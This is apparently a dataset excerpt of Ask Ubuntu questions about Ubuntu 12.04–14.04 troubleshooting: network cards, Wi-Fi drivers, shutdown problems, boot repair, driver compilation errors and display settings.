is what i get total 16 drwx -- -- -- 2 root root 16384 jul 3 10:05 lost+found edit : i got it to work i just had to change the permissions with chown after mounting the hard drive .
488216	ubuntu 14.04 64-bit laptop can not remain powered off . after shutdown , powers off , but then restarts	a few months again my laptop stopped being able to shut down . i do not recall any changes which might have caused the problem . i was using ubuntu 13.04 64-bit on a machine built by system76 . i upgraded to ubuntu 14.04 lts 64-bit hoping this would solve the issue , but the problem persists . i can only turn off the computer by pressing and holding the power button . update of problem : the unintended reboot only occurs when the laptop is plugged in , i.e . not on batter power . the problem occurs when using the shutdown button on the upper right of the screen or when i try command line options such as : sudo shutdown now -p or sudo init 0 i have tried to solve it with the following : sudo apt-get install laptop-mode-tools but to no avail . i also tried booting from a live-cd into ubuntu 13.04 , then attempting the shutdown , again without success .
488219	installing tizen sdk on another partition in ubuntu 12.04	i 'm a newbie with ubuntu & i 'm trying to install tizen sdk but my boot partition is full , as i 'm using ubuntu alongside windows 7 , but i do have another partition that have enough space to run the tizen sdk , but i donât know how to install it , is it possible to install it ?
488221	network unclaimed with hp ethernet 1gb 4-port 331t adapter	my desktop computer runs ubuntu 14.04 lts . it has a one port ethernet 'eth0 ' interface . i have four ethernet-enabled signal processing devices . to connect these devices to my computer for data acquisition , i bought a four-port ethernet card from hp , shown in the link below , http : //h18004.www1.hp.com/products/servers/networking/331t/ at first , upon plugging the card into my computer and restarting it , the card is recognized perfectly and the tg3 driver seemed to have been installed automatically and properly . the card interfaces were : eth1 , eth2 , eth3 and eth4 . further , i was able to acquire data using the two ports from this card . however , upon restarting my computer once more , i got an option to press ctrl+s so that i can go to the configuration menu for this newly installed ethernet card . upon pressing ctrl+s my screen halted for a minute or two then my computer restarted on its own , and i was not able to see the configuration menu for the ethernet card anymore . additionally , upon logging in to my account , i found the ethernet card disappeared . upon typing ifconfig in the terminal i used to get eth0 , eth1 to eth4 . but now i only get eth0 . please see below . ga-ma785gmt-ud2h : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:24:1d:8f : d4 : e7 inet addr:192.168.1.12 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :224:1dff : fe8f : d4e7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:411812 errors:0 dropped:0 overruns:0 frame:0 tx packets:241270 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:584403692 ( 584.4 mb ) tx bytes:18748826 ( 18.7 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2428 errors:0 dropped:0 overruns:0 frame:0 tx packets:2428 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:244007 ( 244.0 kb ) tx bytes:244007 ( 244.0 kb ) further , after this issue , i get the below error message , ga-ma785gmt-ud2h : ~ $ dmesg | grep tg3 [ 1.451456 ] tg3.c : v3.134 ( sep 16 , 2013 ) [ 1.459764 ] tg3 0000:02:00.0 : phy probe failed , err -19 [ 1.519599 ] tg3 0000:02:00.0 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 1.579626 ] tg3 0000:02:00.0 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 1.639660 ] tg3 0000:02:00.0 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 1.639692 ] tg3 0000:02:00.0 : problem fetching invariants of chip , aborting [ 1.658548 ] tg3 0000:02:00.1 : phy probe failed , err -19 [ 1.715699 ] tg3 0000:02:00.1 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 1.775730 ] tg3 0000:02:00.1 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 1.835760 ] tg3 0000:02:00.1 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 1.835791 ] tg3 0000:02:00.1 : problem fetching invariants of chip , aborting [ 1.843939 ] tg3 0000:02:00.2 : phy probe failed , err -19 [ 1.903793 ] tg3 0000:02:00.2 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 1.963826 ] tg3 0000:02:00.2 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 2.023869 ] tg3 0000:02:00.2 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 2.023901 ] tg3 0000:02:00.2 : problem fetching invariants of chip , aborting [ 2.036043 ] tg3 0000:02:00.3 : phy probe failed , err -19 [ 2.095898 ] tg3 0000:02:00.3 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 2.155928 ] tg3 0000:02:00.3 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 2.215963 ] tg3 0000:02:00.3 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . [ 2.215995 ] tg3 0000:02:00.3 : problem fetching invariants of chip , aborting using the command below shows that the four ports pertaining to this card are unclaimed , ga-ma785gmt-ud2h : ~ $ sudo lshw -c network *-network:0 unclaimed description : ethernet controller product : netxtreme bcm5719 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm vpd msi msix pciexpress cap_list configuration : latency=0 resources : memory : fdbf0000-fdbfffff memory : fdbe0000-fdbeffff memory : fdbd0000-fdbdffff memory : fdb00000-fdb007ff *-network:1 unclaimed description : ethernet controller product : netxtreme bcm5719 gigabit ethernet pcie vendor : broadcom corporation physical id : 0.1 bus info : pci @ 0000:02:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm vpd msi msix pciexpress cap_list configuration : latency=0 resources : memory : fdbc0000-fdbcffff memory : fdbb0000-fdbbffff memory : fdba0000-fdbaffff memory : fdb00800-fdb00fff *-network:2 unclaimed description : ethernet controller product : netxtreme bcm5719 gigabit ethernet pcie vendor : broadcom corporation physical id : 0.2 bus info : pci @ 0000:02:00.2 version : 00 width : 64 bits clock : 33mhz capabilities : pm vpd msi msix pciexpress cap_list configuration : latency=0 resources : memory : fdb90000-fdb9ffff memory : fdb80000-fdb8ffff memory : fdb70000-fdb7ffff memory : fdb01000-fdb017ff *-network:3 unclaimed description : ethernet controller product : netxtreme bcm5719 gigabit ethernet pcie vendor : broadcom corporation physical id : 0.3 bus info : pci @ 0000:02:00.3 version : 00 width : 64 bits clock : 33mhz capabilities : pm vpd msi msix pciexpress cap_list configuration : latency=0 resources : memory : fdb60000-fdb6ffff memory : fdb50000-fdb5ffff memory : fdb40000-fdb4ffff memory : fdb01800-fdb01fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:24:1d:8f : d4 : e7 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.12 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport : ce00 ( size=256 ) memory : fdfff000-fdffffff memory : fdfe0000-fdfeffff memory : fdf00000-fdf0ffff i formatted my computer , and reinstalled a fresh ubuntu 14.04 lts . however , this problem persisted and i am still getting the same issues shown in the commands above . i contacted hp and they asked me to contact ubuntu to see if this problem is due to some issue with the driver of this card . this card is replacement for an earlier card from hp where we had the exact same problem . i will appreciate any help on this . thank you .
488222	what is unix and what is the relation of it with linux	when i hear linux i always hear unix , solaris and gnu and frankly i do n't understand any word of this only linux , so could some one explain to me what is each one ?
488225	set grub2 to boot from a .vmdk file	so , basically i have installed windows 7 in a virtual machine , and i want to boot the virtual machine 's hard drive up on my pc , my grub2 and 40_config files can be found by clicking those hyperlinks .
488226	when using internal laptop speakers sound will often stop working and seldom come back .	it 's like the title says . the sound comes and goes seemingly randomly , but tends to go more often than it comes back . i installed ubuntu 14.04 lts on my laptop recently . using my external speakers works fine but when i unplug them the sound is prone to suddenly disappearing and very often not coming back until i plug them back into my external speakers . i have screwed around with the sound settings and all the sliders seem to be in the right place and the speaker chosen for playback is `` speakers-built in audio '' . it looks the same as when it works . so i did some googling and it led me to this thread . i ran the alsa info script as suggested by the answerer , once while the sound was working on internal speakers and once while it was n't . i ran the information output from each through a text difference checker together and got this result . a couple values are different but i do n't really know what to make of it or how to fix it . the text on the left is while it is working ( still internal speakers though ) and the text on the right is while the sound is gone .
488227	apache/php generates blank pages and a 500 internal server error ( ubuntu 12.04 php 5.3.10 )	i 'm having troubles with my php . when i open a file on localhost , it generates a blank page . i looked at my browser 's console and it is giving a 500 internal server error . the page i try to open is n't even listed in /var/log/apache2/error.log , however there are some other errors . here they are : [ wed jun 25 17:12:43 2014 ] [ error ] [ client 127.0.0.1 ] php warning : fopen ( /dev/tty ) : failed to open stream : no such device or address in /var/www/rpmsolutions/setup.php on line 192 error : can not open .git/fetch_head : permission denied [ wed jun 25 17:13:08 2014 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ wed jun 25 17:13:08 2014 ] [ error ] [ client 127.0.0.1 ] php warning : fopen ( /dev/tty ) : failed to open stream : no such device or address in /var/www/rpmsolutions/setup.php on line 192 error : can not open .git/fetch_head : permission denied could it be a problem with .htaccess ? thanks .
488228	install ubuntu 14.04 lts ( trusty tahr ) on dell latitude e5430 with windows	may i know if i can install ubuntu 14.04 lts ( trusty tahr ) on my dell latitude e5430 laptop . i bought it with windows 7 installed , later i installed windows 8 which was later upgraded to windows 8.1 . at present i have both windows 7 and windows 8 on laptop with dual boot option . is it possible to intall a third boot option as linus ox or do i have to remove any one of windows ?
488232	installing 12.04.4 on hp pavilion notebook	i installed 12.04.4 on an hp pavilion entertainment laptop ; deleting windows xp . all seemed fine ; i received the first couple screen options , rebooted when instructed to do so and get a blank screen with a blinking cursor under bar in the upper left corner . what did i do wrong ? thank you !
488234	i just installed ubuntu 14.04 on virtualbox 4.3.12 ( windows 7 ) , where do i begin ? lamp ?	can anyone direct me to some beginner tutorials so i can learn the basics of ubuntu 14.04 and what to configure/install ? furthermore , any good tutorials for installing/configuring lamp ?
488237	no wifi in ubuntu 14.04	my wifi stopped working right around the time i saw a little popup saying : '' network service discovery disabled -- your current network has a .local domain , which is not recommended and incompatible with the avahi network service discovery . the service has been disabled . '' this all started when my piece of junk centurylink c1000a modem kept freezing up . i finally put it in transparent bridge mode and set up m0n0wall as a router on an old pc ... internet has not gone down since : ) but then [ obvioulsy ] the wifi stopped working on the centurylink modem . i found an old netgear wgt624 v3 router and am only using the wifi part of it ( i.e . nothing is plugged into the wan port , i just have a patch cord connecting one of it 's lan ports to my main switch ) . i should note , my iphone and google chromecast are both able to connect to the netgear wifi just fine . previously , i had appended my domain to the end of my hostname in /etc/hostname but soon realized i should leave that as just the hostname , and instead modify /etc/hosts . so , my hostname no longer has a trailing .local of any kind , however , in /etc/hosts i have : 127.0.1.1 laptop.domain.com laptop anyway ... how do i troubleshoot this ? i even disabled security entirely on my ssid so it 's basically `` open '' to the public , yet i still can not connect . i do not get any errors or pop-ups when trying to connect to wifi , the only thing that happens is my wifi icon in the top panel appears to try and connect , but eventually just goes back to the up/down ethernet arrow logo . thank you !
488238	ifconfig eth0 eth0 : error fetching interface information : device not found	i 'm new to ubuntu . in my system wifi is working fine but ethernet is not working fine . ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:13703 errors:0 dropped:0 overruns:0 frame:0 tx packets:13703 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1263769 ( 1.2 mb ) tx bytes:1263769 ( 1.2 mb ) wlan0 link encap : ethernet hwaddr 0c:60:76:65 : d7 : c2 inet addr:10.67.110.56 bcast:10.67.110.255 mask:255.255.255.0 inet6 addr : fe80 : :e60:76ff : fe65 : d7c2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:418816 errors:0 dropped:0 overruns:0 frame:464023 tx packets:367793 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:544360588 ( 544.3 mb ) tx bytes:32354669 ( 32.3 mb ) interrupt:17 base address:0xc000 when i 'm trying to get eth0 i am getting an message like ifconfig etho etho : error fetching interface information : device not found '' and i have done lspci | grep -i eth it returns nothing . could you provide solutions for this ?
488239	xfce-like menu in unity ?	i am a new ubuntu 14.04 user ( having moved from windows xp at the advice of a friend ) , and i 'm loving it ! i like unity a lot , but one thing that i dearly miss is the windows start menu 's folder-like structure to categorize applications in folders ( e.g . games , internet , graphics , etc. ) . i found and installed xfce , and i installed the whisker launcher , and i really like that a lot because they had a similar folder/menu structure of the windows start menu , but unity works very well on my machine and has obvious advantages over xfce / whisker . i 'm wondering , is there some kind of application that i can use in unity to simulate the start menu like functionality of xfce/whisker ? for example , is there an application which i can dock in launcher that looks like the xfce/whisher launcher ? the closest thing i could find in unity was opening ubuntu software center > installed , and i see them all categorized exactly how i want them , but i ca n't launch the apps from there . here 's a mock up of what i 'd like to do in unity :
488242	how do i disable update-apt-xapi	every day , at a random time , my ancient laptop becomes unusable . something decides to consume the entire 1gib of ram plus several hundred mibs of swap , and thrash my hard drive . it brings the computer to its knees for 15-30 minutes . i have set update-manager to never check for updates , i have set update-notifier to not run on startup . this just happened yet again , and i found update-apt-xapi running , consuming 100 % cpu . when it went away , my computer became usable again . other than that , there 's no obvious culprit for this large memory consumption and crippling of my machine . how can i stop my computer from locking up every day ? this is an ancient laptop with 1gib ram , running xubuntu 14.04
488252	obscure warning about future updates from ubuntu software center 12.04 lts	i tried to install font manager and got an obscure warning from the ubuntu software center : if you install font manager , future updates will not include new items in the ubuntu desktop system set . are you sure you want to continue ? is it safe to continue with the installation ?
488253	how do i get wireless working again after a reinstall ?	i had a normal wired connection to begin with when i originally installed ubuntu , but now i really want to do a reinstall to another partition ( just to start fresh ) . the problem is that i do not currently have the capability to connect in a wired manner , my parents have a server running off of the single ethernet port on the router , and right now i absolutely do n't want to try unplugging it for at least another month . i have wireless on my original installation , the one i 'm sending this from , but i have a broadcom card , which ubuntu is infamous for its lack of compatibility with . both are 32 bit , i have a 64 bit installation that i use when i need it ( not all that often ) but i mostly use a 32 bit setup . i want to know how i can install the proper drivers offline , along with why in bloody hell does ubuntu not have any usable drivers included for a type of wireless card that has more or less become the standard for wireless on laptops . it is a bcm43227 card on an acer aspire 7560 laptop with 4 gb of ram .
488254	could not boot ubuntu alongside windows 8	[ i 'm a beginner to linux ] hi i installed ubuntu 14.04 alongside windows 8 following instructions in here - http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html without much awareness of uefi boot mode , i selected /dev/sda ( not an efi boot partition ) for boot loader during the ubuntu installation . i could n't boot to ubuntu , it always boots windows 8 . based on advice in the forums , booted using live cd and tried boot repair . beginning with `` recommended repair '' , i tried several attempts still unable to fix anything . here are the key settings in the last attempt : associated boot partition with efi option ( which is in /dev/sda7 ) selected to use default efi file name and to backup and rename windows efi file names . disabled secureboot like i said , no solution yet . here is the paste bin link http : //paste.ubuntu.com/7703609/ few things i noticed in this output ( not sure if they are relevant ) unusual efi : please report this message to boot.repair @ gmail.com warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . should i try to do a clean reinstall selecting /dev/sda7 as bootloader ? will it break windows ? thanks in advance !
488263	ctrl alt t no longer opens terminal	i wanted to change my computer name so i edited /etc/hostname and /etc/hosts and restarted . ever since then , ctrl + alt + t no longer opens terminal . i tried going into keyboard and making a custom shortcut , but it still wo n't open terminal . what gives ?
488264	my microsd mounted read-only	i know this question has been asked a lot . i 've tried all the solutions , such as formatting , reboot , remount , etc . but my microsd still read-only . i have partitioned my micro sd into 2 partitions and 1 of partition i mount it as /data in my android and the last one as sd card . /data is one of the storage space in android ( ex : /system , /data , /cache , /etc ) os : ubuntu 14.04
488265	how to enable 802.11r capability ?	i am using trusty , which contains wpa_supplicant v2.1 . per its document , starting from v2.1 , 802.11r is supported . so i directly configured my wpa_supplicant to connect a 802.11r enabled wlan from cisco wlc , using key_mgmt as ft-eap . it connected , and from wlc log , ft was enabled . but i can not find the line that wlc recognized the device as 802.11r capable . thus roaming still triggered new auth request , instead of re-association . what else should i do ? the kernel is 3.12.18 from kernel.ubuntu.com .
488269	displaylink adapter does n't work for 12.04lts	i have tried to google all the way but i ca n't find any concrete answer to solve my problem . i bought a asus-ve248h and a display link usb adpater . i plugged it in my hp-23-b020a and nothing shows up . here 's the spec of my hp , it is using gt610 , the spec is here . and it supports multi-display . i installed apt-get install xserver-xorg-video-displaylink and reboot , the monitor should turn green , but it did n't . and it shows dvi no signal . it remains black all the time . anyone have ideas how to fix this ? not sure if these help , timothy @ timothy-23-b020a : ~ $ cat /proc/fb 0 efi vga 1 udlfb timothy @ timothy-23-b020a : ~ $ grep -i drivers /var/log/xorg.0.log [ 18.986 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 19.057 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 19.083 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 19.125 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 19.125 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 19.126 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so timothy @ timothy-23-b020a : /usr/share/x11 $ ls locale rgb.txt xerrordb xkb xorg.conf.d timothy @ timothy-23-b020a : /usr/share/x11 $ cd xorg.conf.d/ timothy @ timothy-23-b020a : /usr/share/x11/xorg.conf.d $ ls 10-evdev.conf 11-evdev-quirks.conf 11-evdev-trackpoint.conf glamoregl.conf thank you so much .
488271	rtl8192su driver compatible with 14.04 running kernel 3.13	i need some help with some older wireless adapters working with ubuntu 14.04 running kernel 3.13 . trying to install : linux driver rtl8192su - this driver supports realtek rtl8192su usb wireless lan nic for 2.6 kernel : fedora core 2/3/4/5 , debian 3.1 , mandrake 10.2/mandriva 2006 , suse 9.3/10.1/10.2 , gentoo 3.1 , ubuntu 7.10/8.04 , etc . 2.4 kernel : redhat 9.0/9.1 my first guess is that my kernel is n't supported based on the above information . when i tried to make/make install i received several errors . see output below . is there any way that the driver can be compatible with my kernel or do i just need to purchase a newer wifi adapter ? this is the output i get when i run the `` make '' command : esther @ estherscomputer : ~ $ cd downloads/ esther @ estherscomputer : ~/downloads $ ls rtl8192su_linux_2.6.0002.0708.2009 rtl8192su_linux_2.6.0002.0708.2009.tar.gz esther @ estherscomputer : ~/downloads $ cd rtl8192su_linux_2.6.0002.0708.2009/ esther @ estherscomputer : ~/downloads/rtl8192su_linux_2.6.0002.0708.2009 $ ls firmware module.symvers wlan0dhcp hal radiopower.sh wlan0down ieee80211 readme.txt wlan0up ifcfg-wlan0 release_note wpa1.conf makefile runwpa wpa_supplicant-0.5.10 modules.order wireless-rtl-ac-dc-power.sh wpa_supplicant-0.5.10.tar.gz esther @ estherscomputer : ~/downloads/rtl8192su_linux_2.6.0002.0708.2009 $ make make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-29-generic' cc [ m ] /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.o /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:212:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8192_usb_probe’ static int __devinit rtl8192_usb_probe ( struct usb_interface *intf , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:214:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8192_usb_disconnect’ static void __devexit rtl8192_usb_disconnect ( struct usb_interface *intf ) ; ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:228:12 : error : ‘rtl8192_usb_probe’ undeclared here ( not in a function ) .probe = rtl8192_usb_probe , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:229:16 : error : ‘rtl8192_usb_disconnect’ undeclared here ( not in a function ) .disconnect = rtl8192_usb_disconnect , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c : in function ‘rtl8192_proc_module_init’ : /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1204:2 : error : implicit declaration of function ‘create_proc_entry’ [ -werror=implicit-function-declaration ] rtl8192_proc=create_proc_entry ( rtl819xu_module_name , s_ifdir , init_net.proc_net ) ; ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1204:14 : warning : assignment makes pointer from integer without a cast [ enabled by default ] rtl8192_proc=create_proc_entry ( rtl819xu_module_name , s_ifdir , init_net.proc_net ) ; ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c : in function ‘rtl8192_proc_init_one’ : /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1254:16 : warning : assignment makes pointer from integer without a cast [ enabled by default ] priv- > dir_dev = create_proc_entry ( dev- > name , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1262:2 : error : implicit declaration of function ‘create_proc_read_entry’ [ -werror=implicit-function-declaration ] e = create_proc_read_entry ( `` stats-rx '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1262:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` stats-rx '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1272:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` stats-tx '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1292:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` stats-ap '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1301:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-0 '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1308:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-1 '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1315:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-2 '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1339:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-8 '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1346:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-9 '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1353:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-a '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1360:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-b '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1367:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-c '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1374:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-d '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:1381:4 : warning : assignment makes pointer from integer without a cast [ enabled by default ] e = create_proc_read_entry ( `` registers-e '' , s_ifreg | s_irugo , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c : in function ‘rtl819x_set_mcast_register’ : /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:4338:24 : warning : unused variable ‘dev’ [ -wunused-variable ] struct net_device *dev = priv- > ieee80211- > dev ; ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c : in function ‘rtl8192su_macconfigafterfwdownload’ : /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:7405:24 : warning : comparison between ‘rtl819xusb_loopback_e’ and ‘enum _rtl8192susb_loopback’ [ -wenum-compare ] if ( priv- > loopbackmode == rtl8192su_no_loopback ) ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:7407:30 : warning : comparison between ‘rtl819xusb_loopback_e’ and ‘enum _rtl8192susb_loopback’ [ -wenum-compare ] else if ( priv- > loopbackmode == rtl8192su_mac_loopback ) ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c : at top level : /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:11284:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8192_usb_probe’ static int __devinit rtl8192_usb_probe ( struct usb_interface *intf , ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:11440:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8192_usb_disconnect’ static void __devexit rtl8192_usb_disconnect ( struct usb_interface *intf ) ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:8163:33 : warning : ‘rtl8192_stats’ defined but not used [ -wunused-function ] static struct net_device_stats *rtl8192_stats ( struct net_device *dev ) ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:8924:13 : warning : ‘r8192_set_multicast’ defined but not used [ -wunused-function ] static void r8192_set_multicast ( struct net_device *dev ) ^ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.c:11197:13 : warning : ‘halusbsetqueuepipemapping8192susb’ defined but not used [ -wunused-function ] static void halusbsetqueuepipemapping8192susb ( struct usb_interface *intf , struct net_device *dev ) ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u/r8192u_core.o ] error 1 make [ 1 ] : *** [ _module_/home/esther/downloads/rtl8192su_linux_2.6.0002.0708.2009/hal/rtl8192u ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-29-generic' make : *** [ all ] error 2 esther @ estherscomputer : ~/downloads/rtl8192su_linux_2.6.0002.0708.2009 $ edit here is the link to the wireless script : http : //pastebin.ubuntu.com/7771967/ please note that my original question was asked before i crashed my laptop . i 've since recreated my machine in a vm .
488272	do i need separate graphics card to run ubuntu server 14.04 ?	currently my company has a server running ubuntu server 14.04 64 bit with 4 gb of memory and intel core i3-2100 processor . and we want to build new a server that will use intel xeon e3-1230v3 processor ( see this link ) and 16 gb of memory . since the processor does n't has integrated graphics , and ubuntu server does n't has a gui , do i need separate graphics card to run this machine ? does ubuntu server needs a graphics processor although it is run on text mode ? any comments will be greatly appreciated . thanks .
488274	can ubuntu be `` uninstaled ? ''	i have a desktop with a second hard drive that i rarely use and am interested in playing around with linux . i was thinking i might try dual booting ubuntu from this second drive but i am curious to know if i can completely erase the os and everything with it and just use it as a secondary hard drive again for my original os ( which is windows 7 ) . i know almost nothing about linux and this may be a dumb question but i am just interested in testing ubuntu out and i might want my drive back some day .
488275	how can i configure x11 so i can independently set the dpi for each monitor ?	i am not just asking how to change the dpi of x11 as a whole , but instead how to make each monitor run on a separate dpi . i am trying to use two 900p monitors ( 19 inch ) and one 720p tv ( 30 inch ) .
